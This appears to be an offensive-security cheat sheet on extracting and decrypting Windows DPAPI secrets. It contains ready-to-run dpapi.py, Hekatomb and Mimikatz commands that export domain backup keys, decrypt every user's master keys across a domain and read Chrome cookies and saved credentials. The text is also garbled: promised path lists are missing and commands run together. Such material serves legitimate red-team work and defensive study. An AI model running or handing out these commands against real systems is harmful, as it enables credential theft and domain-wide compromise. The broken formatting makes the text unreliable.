The DPAPI (Data Protection API) is an internal component in the Windows system. It allows various applications to store sensitive data (e.g. passwords). The data are stored in the users directory and are secured by user-specific master keys derived from the users password. They are usually located at:
Application like Google Chrome, Outlook, Internet Explorer, Skype use the DPAPI. Windows also uses that API for sensitive information like Wi-Fi passwords, certificates, RDP connection passwords, and many more.
Below are common paths of hidden files that usually contain DPAPI-protected data.
# Decrypt a master keydpapi.pymasterkey-file"/path/to/masterkey_file"-sid $USER_SID -password $MASTERKEY_PASSWORD# Obtain the backup keys & use it to decrypt a master keydpapi.pybackupkeys-t $DOMAIN/$USER:$PASSWORD@$TARGET --exportdpapi.pymasterkey-file"/path/to/masterkey_file"-pvk"/path/to/backup_key.pvk"# Decrypt DPAPI-protected data using a master keydpapi.pycredential-file"/path/to/protected_file"-key $MASTERKEY
DonPAPI
DonPAPI (Python) can also be used to remotely extract a user's DPAPI secrets more easily. It supports pass-the-hash, pass-the-ticket and so on.
Hekatomb (python script) can also be used. It connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them.
# Obtain the backup keys & use it to decrypt all blob from usershekatomb $DOMAIN/$USER:$PASSWORD@$TARGET# Decrypt all blob from users using saved backup keyhekatomb-pkv/path/to/backup_key.pvk $DOMAIN/$USER:$PASSWORD@$TARGET
On Windows systems Mimikatz (C) can be used to extract, decrypt or use specific master keys using specified passwords or given sufficient privileges.
# Extract and decrypt a master keydpapi::masterkey /in:"C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SUID\$GUID" /sid:$SID /password:$PASSWORD /protected
# Extract and decrypt all master keyssekurlsa::dpapi# Extract the backup keys & use it to decrypt a master keylsadump::backupkeys/system:$DOMAIN_CONTROLLER /exportdpapi::masterkey/in:"C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SUID\$GUID"/pvk:$BACKUP_KEY_EXPORT_PVK# Decrypt Chrome datadpapi::chrome/in:"%localappdata%\Google\Chrome\User Data\Default\Cookies"# Decrypt DPAPI-protected data using a master keydpapi::cred/in:"C:\path\to\encrypted\file"/masterkey:$MASTERKEY